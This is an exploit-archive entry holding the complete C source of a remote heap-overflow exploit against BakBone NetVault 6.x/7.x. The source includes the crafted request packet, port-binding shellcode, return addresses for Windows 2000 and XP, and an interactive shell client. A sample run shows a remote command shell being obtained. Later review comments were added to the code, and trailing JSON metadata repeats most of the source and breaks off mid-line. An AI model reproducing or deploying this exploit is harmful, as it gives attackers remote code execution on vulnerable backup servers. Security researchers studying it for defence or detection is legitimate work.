ID 1337DAY-ID-8567 Type zdt Reporter nolimit Modified 2005-05-17T00:00:00
Description
Exploit for unknown platform in category remote exploits
====================================================
BakBone NetVault 6.x/7.x Remote Heap Buffer Overflow
====================================================
/* Bakbone Netvault heap overflow exploit.
Software Hole discovered by BuzzDee
POC written by nolimit and BuzzDee.
As class101 has already shown, this application has a lot of holes.
This is another remote heap overflow. This was tested on the demo version
of netvault. We considered mailing the vendor on this one, but figured we'd receive
the same response class did, which was none. So perhaps a second critical vulnerability
will wake Bakbone up to their software faults.
A note to skiddies about this exploit
This won't really net you a lot of elite b0xes because class101's isn't patched,
so it's just as vulnerable as this. Not to mention the fact that not many businesses
use this software anyway.
..Maybe it's because of all the holes??
Thx to Flare, AceHigh, Shift,class101, and of course BuzzDee.
Sorry.. everyone wants to be famous :)
C:\CODING\c++\netvault\Release>netvault 1 2KVM
[*] Target: 2KVM Port: 20031
Targetting 2K..
[*] Socket initialized...
[*] Sending buffer.
[*] Sleeping..............
[*] Connecting again to trigger overflow..
[*] Connecting to host: 2KVM on port 101
[*] Exploit worked! dropping into shell
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
C:\Program Files\BakBone Software\NetVault>
[email protected]
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <io.h>
#include <winsock.h>
#pragma comment(lib,"ws2_32")
void cmdshell (int sock);
long gimmeip(char *hostname);
/* Global scratch buffer the request is assembled in. main() fills all
 * 40000 bytes and passes the first 39950 to send(). Note that cmdshell()
 * declares a local `buffer` of its own that shadows this one. */
char buffer[40000];
//initial request to host
char packet[]=
"\x00\x00\x02\x01\x00\x00\x00\x8F\xD0\xF0\xCA\x0B\x00\x00\x00\x69"
"\x3B\x62\x3B\x6F\x3B\x6F\x3B\x7A\x3B\x00\x11\x57\x3C\x42\x00\x01"
"\xB9\xF9\xA2\xC8\x00\x00\x00\x00\x03\x00\x00\x00\x00\x01\xA5\x97"
"\xF0\xCA\x05\x00\x00\x00\x6E\x33\x32\x3B\x00\x20\x00\x00\x00\x10"
"\x02\x4E\x3F\xAC\x14\xCC\x0A\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01"
"\xA5\x97\xF0\xCA\x05\x00\x00\x00\x6E\x33\x32\x3B\x00\x20\x00\x00"
"\x00\x10\x02\x4E\x3F\xC0\xA8\xEA\xEB\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x01\xA5\x97\xF0\xCA\x05\x00\x00\x00\x6E\x33\x32\x3B\x00\x20"
"\x00\x00\x00\x10\x02\x4E\x3F\xC2\x97\x2C\xD3\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\xB9\xF9\xA2\xC8\x02\x02\x00\x00\x00\xA5\x97\xF0\xCA"
"\x05\x00\x00\x00\x6E\x33\x32\x3B\x00\x20\x00\x00\x00\x04\x02\x4E"
"\x3F\xAC\x14\xCC\x0A\xB0\xFC\xE2\x00\x00\x00\x00\x00\xEC\xFA\x8E"
"\x01\xA4\x6B\x41\x00\xE4\xFA\x8E\x01\xFF\xFF\xFF\xFF\x01\x02";
//class101 modified shellcode from metasploit.com. yummy.
char shellcode[]=
"\x33\xC9\x83\xE9\xAF\xD9\xEE\xD9\x74\x24\xF4\x5B\x81\x73\x13\xBB"
"\x1E\xD3\x6A\x83\xEB\xFC\xE2\xF4\x47\x74\x38\x25\x53\xE7\x2C\x95"
"\x44\x7E\x58\x06\x9F\x3A\x58\x2F\x87\x95\xAF\x6F\xC3\x1F\x3C\xE1"
"\xF4\x06\x58\x35\x9B\x1F\x38\x89\x8B\x57\x58\x5E\x30\x1F\x3D\x5B"
"\x7B\x87\x7F\xEE\x7B\x6A\xD4\xAB\x71\x13\xD2\xA8\x50\xEA\xE8\x3E"
"\x9F\x36\xA6\x89\x30\x41\xF7\x6B\x50\x78\x58\x66\xF0\x95\x8C\x76"
"\xBA\xF5\xD0\x46\x30\x97\xBF\x4E\xA7\x7F\x10\x5B\x7B\x7A\x58\x2A"
"\x8B\x95\x93\x66\x30\x6E\xCF\xC7\x30\x5E\xDB\x34\xD3\x90\x9D\x64"
"\x57\x4E\x2C\xBC\x8A\xC5\xB5\x39\xDD\x76\xE0\x58\xD3\x69\xA0\x58"
"\xE4\x4A\x2C\xBA\xD3\xD5\x3E\x96\x80\x4E\x2C\xBC\xE4\x97\x36\x0C"
"\x3A\xF3\xDB\x68\xEE\x74\xD1\x95\x6B\x76\x0A\x63\x4E\xB3\x84\x95"
"\x6D\x4D\x80\x39\xE8\x4D\x90\x39\xF8\x4D\x2C\xBA\xDD\x76\xD3\x0F"
"\xDD\x4D\x5A\x8B\x2E\x76\x77\x70\xCB\xD9\x84\x95\x6D\x74\xC3\x3B"
"\xEE\xE1\x03\x02\x1F\xB3\xFD\x83\xEC\xE1\x05\x39\xEE\xE1\x03\x02"
"\x5E\x57\x55\x23\xEC\xE1\x05\x3A\xEF\x4A\x86\x95\x6B\x8D\xBB\x8D"
"\xC2\xD8\xAA\x3D\x44\xC8\x86\x95\x6B\x78\xB9\x0E\xDD\x76\xB0\x07"
"\x32\xFB\xB9\x3A\xE2\x37\x1F\xE3\x5C\x74\x97\xE3\x59\x2F\x13\x99"
"\x11\xE0\x91\x47\x45\x5C\xFF\xF9\x36\x64\xEB\xC1\x10\xB5\xBB\x18"
"\x45\xAD\xC5\x95\xCE\x5A\x2C\xBC\xE0\x49\x81\x3B\xEA\x4F\xB9\x6B"
"\xEA\x4F\x86\x3B\x44\xCE\xBB\xC7\x62\x1B\x1D\x39\x44\xC8\xB9\x95"
"\x44\x29\x2C\xBA\x30\x49\x2F\xE9\x7F\x7A\x2C\xBC\xE9\xE1\x03\x02"
"\x54\xD0\x33\x0A\xE8\xE1\x05\x95\x6B\x1E\xD3\x6A";
char jmpToXP[]="\xBD\x9B\x36\x7C"; //XP SP1
char uefOverWriteXP[]="\xB4\x73\xED\x77";//XP SP1
char jmpTo2K[]="\x7E\x6D\x03\x75"; //2k SP4
char uefOverWrite2K[]="\x4C\x14\x54\x7C"; //2K SP4
/*
 * Entry point.
 *
 * argv[1]  target selector: "1" = Windows 2000, "2" = Windows XP (see usage text)
 * argv[2]  host name or dotted-quad address, resolved by gimmeip()
 * argv[3]  optional TCP port; defaults to 20031
 *
 * Returns 1 on usage or socket()/send() errors; every other path ends in
 * exit(1), so the final `return 0` is unreachable.
 *
 * Review notes (documented here, code left as-is):
 *  - the return value of WSAStartup() is never checked;
 *  - atoi() on argv[1]/argv[3] reports no parse errors: a non-numeric port
 *    silently becomes 0 and values above 65535 are truncated by the
 *    assignment to unsigned short;
 *  - the connect() failure paths call exit(1) without closesocket(), while
 *    the socket()/send() failure paths use `return 1` - inconsistent cleanup;
 *  - the socket handed to cmdshell() is never closed;
 *  - sockTCP is an int, so the `== -1` tests only work because INVALID_SOCKET
 *    narrows to -1 on assignment; SOCKET is the proper type for the handle.
 */
int main(int argc,char *argv[])
{
WSADATA wsaData;
struct sockaddr_in targetTCP;
int sockTCP,s;
unsigned short port = 20031;
long ip;
if(argc < 3)
{
printf("Bakbone Netvault Remote Heap Overflow.\n"
"Usage: %s [Target] [address] <port>\n"
" eg: netvault.exe 1 127.0.0.1\n"
"Targets\n1. Windows 2000\n2. Windows XP SP0-1\n"
"Coded by [email protected] and BuzzDee.\n",argv[0]);
return 1;
}
if(argc==4)
port = atoi(argv[3]); // unchecked: "abc" -> 0, >65535 truncated
WSAStartup(0x0202, &wsaData); // return value unchecked; a failure surfaces later as socket() failing
printf("[*] Target:\t%s \tPort: %d\n\n",argv[2],port);
ip=gimmeip(argv[2]); // terminates the process itself on resolution failure
targetTCP.sin_family = AF_INET;
targetTCP.sin_addr.s_addr = ip;
targetTCP.sin_port = htons(port);
/* Fixed layout: every offset below assumes exactly this 40000-byte buffer.
 * The last write ends at 39947+3 == 39950, the length passed to send(). */
memset(buffer,'\x90',40000);
memcpy(buffer,packet,sizeof(packet)-1); //request packet
memcpy(buffer+32790,"\xEB\x0C",2); //JMP ahead over the 2 overwrites
switch(atoi(argv[1])) // unchecked atoi: any non-numeric selector falls into default
{
case 1:
printf("Targetting 2K..\n");
memcpy(buffer+32792,jmpTo2K,sizeof(jmpTo2K)-1); //overwrite pointer to CALL [EDI+74]
memcpy(buffer+32796,uefOverWrite2K,sizeof(uefOverWrite2K)-1); //UEF as chosen.
break;
case 2:
printf("Targetting XP..\n");
memcpy(buffer+32792,jmpToXP,sizeof(jmpToXP)-1); //overwrite pointer to CALL [EDI+74]
memcpy(buffer+32796,uefOverWriteXP,sizeof(uefOverWriteXP)-1); //UEF as chosen.
break;
default:
printf("Error target not found.\n");
return 1;
break; // unreachable after the return above
}
memcpy(buffer+32820,shellcode,sizeof(shellcode)-1); //101 portbind thx class101/metasploit ;p
memcpy(buffer+39947,"\x00\x00\x00",3); //all done! only 39950 bytes! ;P
if ((sockTCP = socket(AF_INET, SOCK_STREAM, 0)) == -1)
{
printf("[x] Socket not initialized! Exiting...\n");
WSACleanup();
return 1;
}
printf("[*] Socket initialized...\n");
if(connect(sockTCP,(struct sockaddr *)&targetTCP, sizeof(targetTCP)) != 0)
{
printf("[*] Connection to host failed! Exiting...\n");
WSACleanup();
exit(1); // leaks sockTCP: no closesocket() before exiting (same on the two connect() paths below)
}
printf("[*] Sending buffer.\n");
Sleep(1000);
if (send(sockTCP, buffer, 39950,0) == -1) // a short send (fewer than 39950 bytes) is not detected
{
printf("[x] Failed to inject packet! Exiting...\n");
WSACleanup();
return 1;
}
printf("[*] Sleeping.");
for(s=0;s<8;s++)
{ //wait for it to catch
printf(".");
Sleep(500);
}
closesocket(sockTCP);
for(s=0;s<5;s++)
{
printf(".");
Sleep(500);
} //exploit triggers when you reconnect sometimes
printf("\n[*] Connecting again to trigger overflow..\n");
if ((sockTCP = socket(AF_INET, SOCK_STREAM, 0)) == -1)
{
printf("[x] Socket not initialized! Exiting...\n");
WSACleanup();
return 1;
}
if(connect(sockTCP,(struct sockaddr *)&targetTCP, sizeof(targetTCP)) != 0)
{
printf("[*] Connection to host failed! Exiting...\n");
WSACleanup();
exit(1);
}
Sleep(500);
closesocket(sockTCP);
printf("[*] Connecting to host: %s on port 101\n",argv[2]);
if ((sockTCP = socket(AF_INET, SOCK_STREAM, 0)) == -1)
{
printf("[x] Socket not initialized! Exiting...\n");
WSACleanup();
return 1;
}
targetTCP.sin_port= htons(101); // port 101 is fixed here, independent of the `port` argument
if(connect(sockTCP,(struct sockaddr *)&targetTCP, sizeof(targetTCP)) != 0)
{
printf("[*] Connection to host failed! Exiting...\n");
WSACleanup();
exit(1);
}
printf("[*] Exploit worked! dropping into shell\n");
cmdshell(sockTCP); // cmdshell() calls WSACleanup() itself before returning
WSACleanup(); // second cleanup; sockTCP is never closesocket()'d
exit(1);
return 0; // unreachable
}
/*
Taken from some random exploit.
good, simple cmdshell function.
*/
/*
 * Relay loop between the local console (fd 0/1 via <io.h>) and a
 * connected socket.
 *
 * sock: connected TCP socket, narrowed to int by the caller.
 * Returns when either direction reports <= 0 from recv/write/read/send;
 * WSACleanup() is called before every return (the caller calls it again).
 *
 * Review notes:
 *  - `o` is cast to fd_set*. This appears to rely on the Winsock fd_set
 *    layout (u_int fd_count followed by the SOCKET array) so that
 *    o[0] = 1, o[1] = sock forms a one-entry read set. It is type punning
 *    through an incompatible pointer, and would break where SOCKET is wider
 *    than unsigned long (64-bit Windows). FD_ZERO/FD_SET express the same
 *    thing portably.
 *  - only `== 1` is treated as "socket readable"; a select() error
 *    (SOCKET_ERROR) is indistinguishable from a timeout and falls into the
 *    blocking console read.
 *  - the local `buffer` shadows the 40000-byte global of the same name;
 *    sizeof(buffer) here is 1000, which is what the code intends.
 *  - `tv` is set once and reused; Winsock's select() does not modify it,
 *    but a POSIX select() may - confirm if this is ever ported.
 *  - the socket is never closesocket()'d on any exit path.
 */
void cmdshell (int sock)
{
struct timeval tv;
int length;
unsigned long o[2];
char buffer[1000];
tv.tv_sec = 1;
tv.tv_usec = 0;
while (1)
{
o[0] = 1; // fd_count
o[1] = sock; // fd_array[0]
length = select (0, (fd_set *)&o, NULL, NULL, &tv); // first arg is ignored by Winsock
if(length == 1)
{
length = recv (sock, buffer, sizeof (buffer), 0);
if (length <= 0)
{
printf ("[x] Connection closed.\n");
WSACleanup();
return;
}
length = write (1, buffer, length); // raw fd write; bypasses stdio buffering used by printf()
if (length <= 0)
{
printf ("[x] Connection closed.\n");
WSACleanup();
return;
}
}
else
{
length = read (0, buffer, sizeof (buffer)); // blocks until console input arrives
if (length <= 0)
{
printf("[x] Connection closed.\n");
WSACleanup();
return;
}
length = send(sock, buffer, length, 0);
if (length <= 0)
{
printf("[x] Connection closed.\n");
WSACleanup();
return;
}
}
}
}
/*********************************************************************************/
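/*
 * Resolve a dotted-quad string or a host name to an IPv4 address.
 *
 * hostname: NUL-terminated dotted quad ("127.0.0.1") or DNS name.
 * Returns the IPv4 address in network byte order, widened to long (the
 * caller stores it in sin_addr.s_addr).  On resolution failure the process
 * is terminated with exit(1) after WSACleanup(), as before; there is no
 * error return.
 *
 * Fixes relative to the original:
 *  - inet_addr() signals failure with INADDR_NONE (0xFFFFFFFF), not a
 *    negative value.  Testing the result with "< 0" after storing it in a
 *    signed long misclassified every address whose last octet is >= 128
 *    (e.g. 10.0.0.200) as a parse failure and pushed it through DNS instead.
 *    255.255.255.255 is still ambiguous with INADDR_NONE and still takes
 *    the DNS path.
 *  - The memcpy from he->h_addr copied he->h_length bytes into a 4-byte
 *    local; a non-IPv4 hostent would have overflowed it.  The address
 *    family and length are now checked before the copy.
 */
long gimmeip(char *hostname)
{
	unsigned long raw;
	struct hostent *he;
	struct in_addr addr;

	raw = inet_addr(hostname);
	if (raw != INADDR_NONE) {
		return (long)raw;
	}

	/* Not a dotted quad: fall back to a DNS lookup. */
	he = gethostbyname(hostname);
	if (he == NULL
	    || he->h_addrtype != AF_INET
	    || he->h_length != (int)sizeof(struct in_addr)
	    || he->h_addr_list[0] == NULL) {
		printf("[x] Failed to resolve host: %s! Exiting...\n\n",hostname);
		WSACleanup();
		exit(1);
	}
	memcpy(&addr, he->h_addr_list[0], sizeof addr);
	return (long)addr.s_addr;
}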
/*********************************************************************************/
{"hash": "7f4b48622c43f14e680822cab25df87e0e46d36c510b12b09619c8efe790296a", "id": "1337DAY-ID-8567", "lastseen": "2018-01-01T15:06:31", "viewCount": 1, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "37e5d5b6ac3ce6fb6d3a6ab0f49b2bf0", "key": "description"}, {"hash": "f92c789b904b8323a2b79a3f89d90aaf", "key": "href"}, {"hash": "eabf37e08cca7c35ae6ce382d4d4431d", "key": "modified"}, {"hash": "eabf37e08cca7c35ae6ce382d4d4431d", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "75491edad9c72286347796c5bc5a3be3", "key": "reporter"}, {"hash": "51a353f49730a66b5838b068963a2dff", "key": "sourceData"}, {"hash": "1cf6161fcb5f5a106ee1773dfa55d522", "key": "sourceHref"}, {"hash": "5cc91cef95aed0d10c276a87300e434e", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "bulletinFamily": "exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "edition": 2, "enchantments": {"score": {"value": 1.7, "vector": "NONE", "modified": "2018-01-01T15:06:31"}, "dependencies": {"references": [{"type": "openvas", "idList": ["OPENVAS:1361412562310814180", "OPENVAS:1361412562310814345", "OPENVAS:1361412562310814342"]}, {"type": "kaspersky", "idList": ["KLA11353", "KLA11100"]}, {"type": "nessus", "idList": ["SMB_NT_MS18_NOV_4465664.NASL"]}, {"type": "zdt", "idList": ["1337DAY-ID-20031"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:11735", "SECURITYVULNS:VULN:4776"]}], "modified": "2018-01-01T15:06:31"}, "vulnersScore": 1.7}, "type": "zdt", "sourceHref": "https://0day.today/exploit/8567", "description": "Exploit for unknown platform in category remote exploits", "title": "BakBone NetVault 6.x/7.x Remote Heap Buffer Overflow", "history": [{"bulletin": {"hash": "1785135769c93c62319293b5971e59bdfcb179f2f35769fe01c67a1d0528ead7", "id": 
"1337DAY-ID-8567", "lastseen": "2016-04-20T01:21:24", "enchantments": {"score": {"value": 9.0, "modified": "2016-04-20T01:21:24"}}, "hashmap": [{"hash": "6698ba32197628b61f7f5e32c8f48b5f", "key": "sourceHref"}, {"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "a7158ad4800c326bf219ded8aaf076ea", "key": "sourceData"}, {"hash": "37e5d5b6ac3ce6fb6d3a6ab0f49b2bf0", "key": "description"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "78e81454822894e6973e045b7f362632", "key": "href"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "5cc91cef95aed0d10c276a87300e434e", "key": "title"}, {"hash": "eabf37e08cca7c35ae6ce382d4d4431d", "key": "modified"}, {"hash": "eabf37e08cca7c35ae6ce382d4d4431d", "key": "published"}, {"hash": "75491edad9c72286347796c5bc5a3be3", "key": "reporter"}], "bulletinFamily": "exploit", "history": [], "edition": 1, "type": "zdt", "sourceHref": "http://0day.today/exploit/8567", "description": "Exploit for unknown platform in category remote exploits", "viewCount": 0, "title": "BakBone NetVault 6.x/7.x Remote Heap Buffer Overflow", "cvss": {"score": 0.0, "vector": "NONE"}, "objectVersion": "1.0", "cvelist": [], "sourceData": "====================================================\r\nBakBone NetVault 6.x/7.x Remote Heap Buffer Overflow\r\n====================================================\r\n\r\n/* Bakbone Netvault heap overflow exploit. \r\nSoftware Hole discovered by BuzzDee\r\nPOC written by nolimit and BuzzDee.\r\n\r\nAs class101 has already shown, this application has a lot of holes. \r\nThis is another remote heap overflow. This was tested on the demo version\r\nof netvault. We considered mailing the vendor on this one, but figured we'd recieve\r\nthe same response class did, which was none. 
So perhaps a second critical vulnerabilty\r\nwill wake Bakbone up to their software faults. \r\n\r\nA note to skiddies about this exploit\r\nThis won't really net you a lot of elite b0xes because class101's isn't patched,\r\n so it's just as vulnerable as this. Not to mention the fact that not many businesses\r\n use this software anyway.\r\n ..Maybe it's because of all the holes??\r\n\r\nThx to Flare, AceHigh, Shift,class101, and of course BuzzDee.\r\nSorry.. everyone wants to be famous :)\r\n\r\n\r\n C:\\CODING\\c++\\netvault\\Release>netvault 1 2KVM\r\n[*] Target: 2KVM Port: 20031\r\n\r\nTargetting 2K..\r\n[*] Socket initialized...\r\n[*] Sending buffer.\r\n[*] Sleeping..............\r\n[*] Connecting again to trigger overflow..\r\n[*] Connecting to host: 2KVM on port 101\r\n[*] Exploit worked! dropping into shell\r\nMicrosoft Windows 2000 [Version 5.00.2195]\r\n(C) Copyright 1985-2000 Microsoft Corp.\r\n\r\nC:\\Program Files\\BakBone Software\\NetVault>\r\n-nolimit@COREiSO\r\n*/\r\n#include <stdio.h>\r\n#include <string.h>\r\n#include <io.h>\r\n#include <winsock.h>\r\n#pragma comment(lib,\"ws2_32\")\r\n\r\nvoid cmdshell (int sock);\r\nlong gimmeip(char *hostname);\r\nchar buffer[40000];\r\n//initial request to host\r\nchar 
packet[]=\r\n\"\\x00\\x00\\x02\\x01\\x00\\x00\\x00\\x8F\\xD0\\xF0\\xCA\\x0B\\x00\\x00\\x00\\x69\"\r\n\"\\x3B\\x62\\x3B\\x6F\\x3B\\x6F\\x3B\\x7A\\x3B\\x00\\x11\\x57\\x3C\\x42\\x00\\x01\"\r\n\"\\xB9\\xF9\\xA2\\xC8\\x00\\x00\\x00\\x00\\x03\\x00\\x00\\x00\\x00\\x01\\xA5\\x97\"\r\n\"\\xF0\\xCA\\x05\\x00\\x00\\x00\\x6E\\x33\\x32\\x3B\\x00\\x20\\x00\\x00\\x00\\x10\"\r\n\"\\x02\\x4E\\x3F\\xAC\\x14\\xCC\\x0A\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\r\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\"\r\n\"\\xA5\\x97\\xF0\\xCA\\x05\\x00\\x00\\x00\\x6E\\x33\\x32\\x3B\\x00\\x20\\x00\\x00\"\r\n\"\\x00\\x10\\x02\\x4E\\x3F\\xC0\\xA8\\xEA\\xEB\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\r\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\r\n\"\\x00\\x01\\xA5\\x97\\xF0\\xCA\\x05\\x00\\x00\\x00\\x6E\\x33\\x32\\x3B\\x00\\x20\"\r\n\"\\x00\\x00\\x00\\x10\\x02\\x4E\\x3F\\xC2\\x97\\x2C\\xD3\\x00\\x00\\x00\\x00\\x00\"\r\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\r\n\"\\x00\\x00\\x00\\xB9\\xF9\\xA2\\xC8\\x02\\x02\\x00\\x00\\x00\\xA5\\x97\\xF0\\xCA\"\r\n\"\\x05\\x00\\x00\\x00\\x6E\\x33\\x32\\x3B\\x00\\x20\\x00\\x00\\x00\\x04\\x02\\x4E\"\r\n\"\\x3F\\xAC\\x14\\xCC\\x0A\\xB0\\xFC\\xE2\\x00\\x00\\x00\\x00\\x00\\xEC\\xFA\\x8E\"\r\n\"\\x01\\xA4\\x6B\\x41\\x00\\xE4\\xFA\\x8E\\x01\\xFF\\xFF\\xFF\\xFF\\x01\\x02\";\r\n//class101 modified shellcode from metasploit.com. 
yummy.\r\nchar shellcode[]=\r\n\t\"\\x33\\xC9\\x83\\xE9\\xAF\\xD9\\xEE\\xD9\\x74\\x24\\xF4\\x5B\\x81\\x73\\x13\\xBB\"\r\n\t\"\\x1E\\xD3\\x6A\\x83\\xEB\\xFC\\xE2\\xF4\\x47\\x74\\x38\\x25\\x53\\xE7\\x2C\\x95\"\r\n\t\"\\x44\\x7E\\x58\\x06\\x9F\\x3A\\x58\\x2F\\x87\\x95\\xAF\\x6F\\xC3\\x1F\\x3C\\xE1\"\r\n\t\"\\xF4\\x06\\x58\\x35\\x9B\\x1F\\x38\\x89\\x8B\\x57\\x58\\x5E\\x30\\x1F\\x3D\\x5B\"\r\n\t\"\\x7B\\x87\\x7F\\xEE\\x7B\\x6A\\xD4\\xAB\\x71\\x13\\xD2\\xA8\\x50\\xEA\\xE8\\x3E\"\r\n\t\"\\x9F\\x36\\xA6\\x89\\x30\\x41\\xF7\\x6B\\x50\\x78\\x58\\x66\\xF0\\x95\\x8C\\x76\"\r\n\t\"\\xBA\\xF5\\xD0\\x46\\x30\\x97\\xBF\\x4E\\xA7\\x7F\\x10\\x5B\\x7B\\x7A\\x58\\x2A\"\r\n\t\"\\x8B\\x95\\x93\\x66\\x30\\x6E\\xCF\\xC7\\x30\\x5E\\xDB\\x34\\xD3\\x90\\x9D\\x64\"\r\n\t\"\\x57\\x4E\\x2C\\xBC\\x8A\\xC5\\xB5\\x39\\xDD\\x76\\xE0\\x58\\xD3\\x69\\xA0\\x58\"\r\n\t\"\\xE4\\x4A\\x2C\\xBA\\xD3\\xD5\\x3E\\x96\\x80\\x4E\\x2C\\xBC\\xE4\\x97\\x36\\x0C\"\r\n\t\"\\x3A\\xF3\\xDB\\x68\\xEE\\x74\\xD1\\x95\\x6B\\x76\\x0A\\x63\\x4E\\xB3\\x84\\x95\"\r\n\t\"\\x6D\\x4D\\x80\\x39\\xE8\\x4D\\x90\\x39\\xF8\\x4D\\x2C\\xBA\\xDD\\x76\\xD3\\x0F\"\r\n\t\"\\xDD\\x4D\\x5A\\x8B\\x2E\\x76\\x77\\x70\\xCB\\xD9\\x84\\x95\\x6D\\x74\\xC3\\x3B\"\r\n\t\"\\xEE\\xE1\\x03\\x02\\x1F\\xB3\\xFD\\x83\\xEC\\xE1\\x05\\x39\\xEE\\xE1\\x03\\x02\"\r\n\t\"\\x5E\\x57\\x55\\x23\\xEC\\xE1\\x05\\x3A\\xEF\\x4A\\x86\\x95\\x6B\\x8D\\xBB\\x8D\"\r\n\t\"\\xC2\\xD8\\xAA\\x3D\\x44\\xC8\\x86\\x95\\x6B\\x78\\xB9\\x0E\\xDD\\x76\\xB0\\x07\"\r\n\t\"\\x32\\xFB\\xB9\\x3A\\xE2\\x37\\x1F\\xE3\\x5C\\x74\\x97\\xE3\\x59\\x2F\\x13\\x99\"\r\n\t\"\\x11\\xE0\\x91\\x47\\x45\\x5C\\xFF\\xF9\\x36\\x64\\xEB\\xC1\\x10\\xB5\\xBB\\x18\"\r\n\t\"\\x45\\xAD\\xC5\\x95\\xCE\\x5A\\x2C\\xBC\\xE0\\x49\\x81\\x3B\\xEA\\x4F\\xB9\\x6B\"\r\n\t\"\\xEA\\x4F\\x86\\x3B\\x44\\xCE\\xBB\\xC7\\x62\\x1B\\x1D\\x39\\x44\\xC8\\xB9\\x95\"\r\n\t\"\\x44\\x29\\x2C\\xBA\\x30\\x49\\x2F\\xE9\\x7F\\x7A\\x2C\\xBC\\xE9\\xE1\\x03\\x02\" 
\r\n\t\"\\x54\\xD0\\x33\\x0A\\xE8\\xE1\\x05\\x95\\x6B\\x1E\\xD3\\x6A\";\r\n\r\nchar jmpToXP[]=\"\\xBD\\x9B\\x36\\x7C\"; //XP SP1\r\nchar uefOverWriteXP[]=\"\\xB4\\x73\\xED\\x77\";//XP SP1\r\nchar jmpTo2K[]=\"\\x7E\\x6D\\x03\\x75\"; //2k SP4\r\nchar uefOverWrite2K[]=\"\\x4C\\x14\\x54\\x7C\"; //2K SP4\r\n\r\nint main(int argc,char *argv[])\r\n{ \r\n\t\tWSADATA wsaData;\r\n\t\tstruct sockaddr_in targetTCP;\r\n\t\tint sockTCP,s;\r\n\t\tunsigned short port = 20031;\r\n\t\tlong ip;\r\n\t\tif(argc < 3)\r\n\t\t{\r\n\t\t\t\r\n\t\t\tprintf(\"Bakbone Netvault Remote Heap Overflow.\\n\"\r\n\t\t\t\t\"Usage: %s [Target] [address] <port>\\n\"\r\n\t\t\t\t\" eg: netvault.exe 1 127.0.0.1\\n\"\r\n\t\t\t\t\"Targets\\n1. Windows 2000\\n2. Windows XP SP0-1\\n\"\r\n\t\t\t\t\t\"Coded by nolimit@CiSO and BuzzDee.\\n\",argv[0]);\r\n\t\t\treturn 1;\t\t\t\r\n\t\t}\t\t\r\n\t\tif(argc==4)\r\n\t\t\tport = atoi(argv[3]);\t\t\t\t\t\r\n WSAStartup(0x0202, &wsaData);\t\t\t\t\r\n\t\tprintf(\"[*] Target:\\t%s \\tPort: %d\\n\\n\",argv[2],port);\r\n\t\tip=gimmeip(argv[2]);\t\r\n targetTCP.sin_family = AF_INET;\r\n targetTCP.sin_addr.s_addr = ip;\r\n targetTCP.sin_port = htons(port);\r\n\t\tmemset(buffer,'\\x90',40000);\r\n\t\tmemcpy(buffer,packet,sizeof(packet)-1); //request packet\r\n\t\tmemcpy(buffer+32790,\"\\xEB\\x0C\",2); //JMP ahead over the 2 overwrites\r\n\t\tswitch(atoi(argv[1]))\r\n\t\t{\r\n\t\t\tcase 1:\r\n\t\t\tprintf(\"Targetting 2K..\\n\");\r\n\t\t\tmemcpy(buffer+32792,jmpTo2K,sizeof(jmpTo2K)-1); //overwrite pointer to CALL [EDI+74]\r\n\t\t\tmemcpy(buffer+32796,uefOverWrite2K,sizeof(uefOverWrite2K)-1); //UEF as chosen.\r\n\t\t\tbreak;\r\n\t\t\tcase 2:\r\n\t\t\tprintf(\"Targetting XP..\\n\");\r\n\t\t\tmemcpy(buffer+32792,jmpToXP,sizeof(jmpToXP)-1); //overwrite pointer to CALL [EDI+74]\r\n\t\t\tmemcpy(buffer+32796,uefOverWriteXP,sizeof(uefOverWriteXP)-1); //UEF as chosen.\r\n\t\t\tbreak;\r\n\t\t\tdefault:\r\n\t\t\tprintf(\"Error target not found.\\n\");\r\n\t\t\treturn 
1;\r\n\t\t\tbreak;\r\n\t\t}\r\n\t\tmemcpy(buffer+32820,shellcode,sizeof(shellcode)-1); //101 portbind thx class101/metasploit ;p\r\n\t\tmemcpy(buffer+39947,\"\\x00\\x00\\x00\",3); //all done! only 39950 bytes! ;P\r\n\t\tif ((sockTCP = socket(AF_INET, SOCK_STREAM, 0)) == -1)\r\n\t\t{\r\n\t\t\t\tprintf(\"[x] Socket not initialized! Exiting...\\n\");\r\n\t\t\t\tWSACleanup();\r\n return 1;\r\n\t\t}\r\n\t\tprintf(\"[*] Socket initialized...\\n\");\t\t\t\t\t\r\n\t\tif(connect(sockTCP,(struct sockaddr *)&targetTCP, sizeof(targetTCP)) != 0)\r\n\t\t{\r\n\t\t\tprintf(\"[*] Connection to host failed! Exiting...\\n\");\r\n\t\t\tWSACleanup();\r\n\t\t\texit(1);\r\n\t\t} \t\t\r\n\t\tprintf(\"[*] Sending buffer.\\n\");\r\n\t\tSleep(1000);\r\n\t\tif (send(sockTCP, buffer, 39950,0) == 